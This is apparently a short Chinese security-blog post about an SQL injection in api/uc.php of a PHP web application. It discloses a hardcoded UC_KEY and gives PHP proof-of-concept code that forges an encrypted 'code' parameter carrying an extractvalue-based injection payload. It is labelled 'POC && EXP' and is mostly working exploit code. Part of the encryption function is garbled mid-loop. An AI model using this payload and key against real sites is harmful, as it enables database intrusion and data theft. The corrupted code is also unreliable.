走过路过不要错过
点击蓝字关注我们
api/uc.php SQL 存在注入
漏洞文件/api/uc.php
正如上面的代码,如果我们知道UCYKEY,我们可以解码所有的$get参数,而“用户名”参数会导致SQL注入在最新版本中,UCKIKE为“UCYKEY”=> E063RBKHX22RAVIG
我们可以使用下面的代码来计算“代码”值
$a = 'time='.time().'&action=synlogin&username=aa" and extractvalue(1,concat(0x7e,user()))#';
$code1 = urlencode(_authcode($a, 'ENCODE', 'e063rbkHX22RAvIg'));
var_dump($code1);exit;
function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
$ckey_length = 4;
$key = md5($key ? $key : UC_KEY);
$keya = md5(substr($key, 0, 16));
$keyb = md5(substr($key, 16, 16));
$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';
$cryptkey = $keya.md5($keya.$keyc);
$key_length = strlen($cryptkey);
$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
$string_length = strlen($string);
$result = '';
$box = range(0, 255);
$rndkey = array();
for($i = 0; $i
0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {return substr($result, 26);
} else {
return '';
}
} else {
return $keyc.str_replace('=', '', base64_encode($result));
}
}
==========================POC && EXP
